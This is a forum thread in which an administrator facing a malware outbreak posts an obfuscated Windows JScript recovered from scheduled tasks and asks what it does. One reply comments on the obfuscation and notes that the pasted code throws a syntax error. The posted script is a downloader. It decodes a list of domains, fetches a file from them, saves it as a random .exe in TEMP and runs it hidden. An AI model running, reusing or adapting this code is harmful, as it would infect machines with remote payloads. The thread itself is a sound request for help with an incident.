Jump to content

Random Scheduled Task


Squidr

Recommended Posts

There is currently a malware or virus outbreak going on in my network.

 

I found some scheduled tasks on a few servers and it made a call to a file. I was able to capture this file and retrieve the code but I can't make heads or tails of it. 

function kqg_U(mJ7Tt, JyBUHp8, ky7uF, aoA48, xAld9Nv, yBmFsD, OeCdJg, oI90Q){var dMfGlv = "ds\x30";if (mJ7Tt.length < dMfGlv.length) {for (var Jk_0h = 0; Jk_0h < mJ7Tt.length; Jk_0h++) {if (Jk_0h != 0x12) {break;}try {dMfGlv += mJ7Tt.charCodeAt(Jk_0h);} catch (e) {Jk_0h += 5;}}}return mJ7Tt.length + Jk_0h;}function U2AuF(oBfiV){try {var CSFVfv = 0;var Ek_nR = new ActiveXObject("AD\u004fDB.\u0053\x74ream");Ek_nR.Type = 2; Ek_nR.Mode = 3; Ek_nR.Charset = "AS\x43I\u0049";Ek_nR.Open();Ek_nR.LoadFromFile(oBfiV);var HuIVtF6 = Ek_nR.ReadText(2);if (HuIVtF6 != "MZ") {CSFVfv = 0;} else {CSFVfv = 1;}Ek_nR.Close();return CSFVfv;} catch (e) {return 0;}}function rtGUw(tBCPe4, Ek_nR, y68EU9, s37Aahl){try {eval(unescape("tB\u0043P\x25\x365\u002534\x252\x45o%\x370e\u00256E\u002528%\x322G\x45T%2\x32\x252C%\u00320%7\x396\u002538E\u0055%\x339, \u002566%\x361%6\u0043se);tBCP%6\u0035\u002534.s%6\u0035%6\u0045d(%6\u0045ul%\x36C%2\x39;%0\u0041"));if (tBCPe4.status != 200) {return -1;}Ek_nR.Type = 1;Ek_nR.Mode = 3;var d2nDksd = tBCPe4.responseBody;Ek_nR.Open();Ek_nR.Write(d2nDksd);Ek_nR.SaveToFile(s37Aahl, 2);Ek_nR.Close();} catch (J55lr6) {return -2;}return 1;}function BS5NBx(m2FjJdn, iJaLCD) {	iUd2nAL = m2FjJdn + Math.floor(Math.random() * (iJaLCD - m2FjJdn));var rN7MN1C = "012\u003345678\x39ABCD\u0045FGHIJ\x4bL\u004dNOPQR\u0053\u0054U\u0056\x57XT\u005a\u0061bcdefghiklmnopqrs\x74uvw\x78yz";var pJ3jM = '';for (var Jk_0h = 0; Jk_0h < iUd2nAL; Jk_0h++) {eval(unescape("v%6\u0031\x2572%\u0032\x30\x2579K\x4f%\u00367b%\x36\u0045\x4b = \x4da%\x37\x34%6\x38\x252Eflo%\x36F\x25\u00372(\u004dat%\x368.ra%\x36Edo%6\u0044(%\x329 %\x32A%\u00320rN\x25\u00337MN1C.\x256Ce\u00256Eg%7\x34%6\x38);%0\u0041"));pJ3jM += rN7MN1C.substring(yKOgbnK,yKOgbnK+1);}return pJ3jM;}function EONSs2b(iF5bi){var AKj39 = "h\u0074tp:/\u002f"+iF5bi+"/4";var tBCPe4 = null;var CSFVfv = 1;eval(unescape("var \x45k_\x256\x45R = n%6\u0035w Ac\u002574iveXO%6\u0032\u0025\x36\x41%6\x35ct%2\x38"ADO\x44B%\x32\x45S%\u00374re\x2561%\x36\u0044\x2522\x2529;%\u00376%6\u0031\u002572 \u0046\x2573%\x3319\x2564P%7\u0038 = \u00256Fxd\u0047A.En%\x376i%\u0037\u0032\u00256Fn%\u0036D%\x365n\u002574(%2\u0032P%7\x32%\u0036F%\u00363\u002565\u002573\x2573")\u00253\x42%\x30\x41"));var AmVJl3f = Fs19dPx.Item("\x54EMP");AmVJl3f += '\\';AmVJl3f += BS5NBx(6,8) + "\u002eexe";try { tBCPe4=new XMLHttpRequest(); } catch(J55lr6) {try { tBCPe4 = new ActiveXObject("\u004dSXML2.Serve\u0072X\u004dL\x48\u0054TP"); } catch(J55lr6) {tBCPe4 = new ActiveXObject("Mic\x72o\x73oft.XML\x48T\x54P");}}try {if (!tBCPe4) {throw 1;}if (rtGUw(tBCPe4, Ek_nR, AKj39, AmVJl3f) < 0) {throw 3;}if (U2AuF(AmVJl3f) == 0) {throw 5;}var oAB1pm = "\""+AmVJl3f+"\"";oxdGA.Run(oAB1pm, 0);} catch (e) {CSFVfv = 0;}return CSFVfv;}function z14v2(d_Qw1G){try {var Ek_nR = new ActiveXObject("AD\u004fD\u0042\u002eStream");Ek_nR.Type = 1;Ek_nR.Mode = 3;eval(unescape("E\x25\x36B%5\u0046nR.Ope%6\x45(%\x329%3\x42%\u0037\u0034%\u00372y \u00257B\x45k_%6\x45R.Lo%6\u0031%\u00364Fr%6\u0046\u0025\u0036DFi%\u0036Ce\x2528d%5\x46\x51w1G\u002529;\x250\u0041\u00257D %\x36\u0033%6\u0031tch %\u00328e%\x329\u002520{%\x30AE%6\x42%\u0035FnR.\x53a\u0025\u00376e\u0054%\u0036FFile%\x328d\x255\u0046\x51%\u00377%\x331G,\u00252\u00302\x2529;%\x30A}\u00250A"));Ek_nR.Close();return 1;} catch (e) {return 0;}}function uN87Q(oxdGA){var zbux9ps = WScript.ScriptName;var a7KM5e = zbux9ps.replace(/\..*/, '' );var U620z0 = oxdGA.ExpandEnvironmentStrings("%T\x45\u004dP%\\~"+a7KM5e+".tm\x70");if (U620z0.length == (a7KM5e.length + 6)) {U620z0 = oxdGA.ExpandEnvironmentStrings("%\u0077ind\u0069\x72%\\TEM\u0050\\~"+a7KM5e+".t\u006dp");}var CSFVfv = 0;if ((CSFVfv = z14v2(U620z0)) == 1) {} else {}return CSFVfv;}var oxdGA = new ActiveXObject("WS\u0063r\u0069pt.She\u006cl");if (uN87Q(oxdGA) == 0) {} else {var c = [113,100,112,103,114,122,101,115,110,110,111,100,115,103,114,97,102,101,99,107,108,97,120,112,98,46,98,105,122,59,115,99,102,99,103,121,115,103,101,111,117,113,118,99,106,112,46,105,110,102,111,59,116,103,102,117,122,108,113,100,102,113,122,117,122,97,115,99,114,110,98,104,101,46,99,111,109,59,119,120,104,108,108,111,116,101,114,108,108,100,120,97,46,98,105,122,59,117,122,120,110,108,100,112,110,105,107,117,104,101,103,109,120,103,114,97,108,99,100,46,99,111,109,59,117,118,120,104,122,108,121,98,99,97,99,110,98,118,103,46,111,114,103,59,109,118,120,112,101,104,106,117,100,107,120,101,122,117,97,122,107,116,46,110,101,116,59,105,112,111,114,111,111,108,106,101,116,101,117,99,107,104,105,98,102,109,120,115,46,111,114,103,59,109,113,97,113,121,114,99,113,122,108,116,100,100,113,120,46,111,114,103,59,120,102,110,105,113,98,99,122,119,122,114,119,118,46,110,101,116,59,122,105,117,113,105,112,104,97,102,115,110,113,106,105,97,106,101,112,111,102,122,108,46,110,101,116,59,115,106,111,99,97,118,119,110,99,101,121,113,104,118,97,112,102,119,97,100,100,115,107,46,98,105,122,59,100,118,110,113,108,117,105,99,122,100,122,106,99,102,105,112,46,110,101,116,59,105,99,100,101,119,102,104,103,104,101,119,100,115,103,119,113,120,120,115,107,102,46,111,114,103,59,115,109,112,108,110,120,104,100,102,103,122,109,113,113,114,103,104,116,46,98,105,122,59,109,109,104,102,115,102,116,115,116,121,107,107,103,110,112,119,122,101,110,109,120,113,107,46,99,111,109,59,97,122,102,121,110,117,117,115,102,115,116,118,97,46,111,114,103,59,113,119,102,114,117,119,103,109,100,106,118,104,109,46,110,101,116,59,116,98,100,122,97,116,107,120,99,121,118,101,102,104,116,112,101,98,97,104,104,46,111,114,103,59,99,115,103,98,101,100,116,121,46,111,114,103,59,59,121,115,106,116,107,105,104,102,110,103,117,112,111,114,104,99,108,122,122,102,103,118,98,109,46,110,101,116,59,118,97,98,102,118,117,118,107,114,120,103,111,110,119,110,122,104,117,111,113,105,100,119,105,103,46,105,110,102,111,59,105,103,106,115,114,115,101,121,119,98,121,98,46,105,110,102,111,59,104,100,100,104,105,112,103,120,103,119,119,108,102,112,98,46,105,110,102,111,59,111,98,115,100,116,118,98,116,102,110,121,118,120,116,103,117,101,100,111,112,112,109,116,117,46,110,101,116,59,102,116,106,121,110,120,113,110,101,114,110,114,110,118,104,114,112,113,98,110,121,100,46,111,114,103,59,122,117,114,103,104,97,108,110,111,120,116,113,108,109,119,101,97,104,103,119,111,121,109,111,122,46,105,110,102,111,59,108,106,102,115,113,116,122,100,119,103,46,98,105,122,59,104,117,97,103,105,98,100,118,116,116,110,102,97,110,114,107,112,115,110,122,109,112,121,115,46,98,105,122,59,106,115,122,103,113,103,112,113,103,103,118,118,102,46,98,105,122,59,110,111,102,111,110,102,103,119,121,101,117,97,101,46,111,114,103,59,101,122,117,109,104,121,107,116,100,120,121,106,110,97,103,109,102,46,99,111,109,59,121,120,97,111,121,111,103,114,109,113,107,100,122,109,121,104,121,122,46,98,105,122,59,106,100,121,117,105,109,99,113,114,110,121,109,108,106,116,46,111,114,103,59,118,110,101,100,121,101,121,119,105,103,103,109,114,112,97,103,99,122,120,120,121,46,111,114,103,59,99,103,105,111,115,121,111,115,111,100,109,108,111,117,109,111,121,116,121,109,46,111,114,103,59,111,118,105,117,100,113,100,105,46,111,114,103,59,103,112,100,104,120,108,98,120,122,121,121,112,46,110,101,116,59,114,106,109,99,122,98,106,98,115,121,115,109,117,111,105,98,117,106,120,46,110,101,116,59,98,110,114,110,111,102,108,104,112,46,105,110,102,111,59,59,114,120,113,122,98,100,97,119,113,100,98,99,104,107,106,120,113,99,119,113,107,46,105,110,102,111,59,114,106,117,117,101,115,113,111,97,113,120,101,118,104,105,111,116,46,110,101,116,59,120,122,117,119,106,119,117,105,115,107,102,107,103,112,108,104,107,46,111,114,103,59,99,103,117,102,97,101,120,101,112,111,119,116,46,110,101,116,59,101,105,107,98,113,97,121,122,102,115,112,110,107,121,106,112,107,114,105,99,121,100,122,46,111,114,103,59,115,110,111,112,100,112,101,107,104,119,122,46,111,114,103,59,97,121,108,99,121,118,114,121,109,116,98,118,110,100,120,115,111,114,117,120,108,98,105,46,98,105,122,59,101,104,107,99,105,113,98,106,118,111,122,103,104,104,109,106,119,97,97,104,113,107,46,110,101,116,59,102,116,109,101,103,112,110,107,110,98,108,105,111,101,122,114,102,117,46,105,110,102,111,59,120,115,105,112,114,115,111,97,112,106,98,117,120,100,117,104,111,110,114,105,108,108,46,98,105,122,59,99,122,105,114,113,108,121,120,97,102,114,46,110,101,116,59,106,103,110,117,108,101,104,97,122,107,100,100,46,110,101,116,59,106,109,115,115,103,112,110,98,107,119,114,121,105,108,102,113,109,108,112,112,119,105,119,113,46,98,105,122,59,107,106,100,103,113,98,106,113,113,100,100,121,112,103,120,102,104,100,120,102,112,105,112,120,97,46,110,101,116,59,108,100,109,120,115,115,103,105,108,99,111,121,112,100,114,122,120,100,112,98,99,115,104,119,46,111,114,103,59,118,98,97,114,115,118,116,116,103,46,98,105,122,59,112,119,120,102,102,106,119,108,113,113,122,101,114,118,111,116,107,122,97,110,46,98,105,122,59,121,117,97,108,110,116,116,110,111,104,117,105,118,114,121,122,117,46,111,114,103,59,110,97,104,118,105,97,111,97,46,110,101,116,59,112,102,113,98,97,118,99,102,114,106,111,46,98,105,122,59];var d = "";var ePtFdbV = [];for (var i=0; i < c.length; i++) {if (c[i] == 59) {ePtFdbV.push(d);d = "";continue;}d += String.fromCharCode(c[i]);		}for (var Jk_0h = 0; Jk_0h < ePtFdbV.length; Jk_0h++) {if (EONSs2b(ePtFdbV[Jk_0h]) == 1) {break;}}	}

Maybe someone has a clue?

Link to post
Share on other sites

The script is using obfuscation techniques that is associated with malicious behaviour.  However, I have also seen obfuscation techniques used to mask interpreted code to protect the programmer's work.

 

The Obfuscated JavaScript has a bug and generates "Error: unterminated string literal".  It may be due to Copy and Paste or it is missing some part of the script.

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.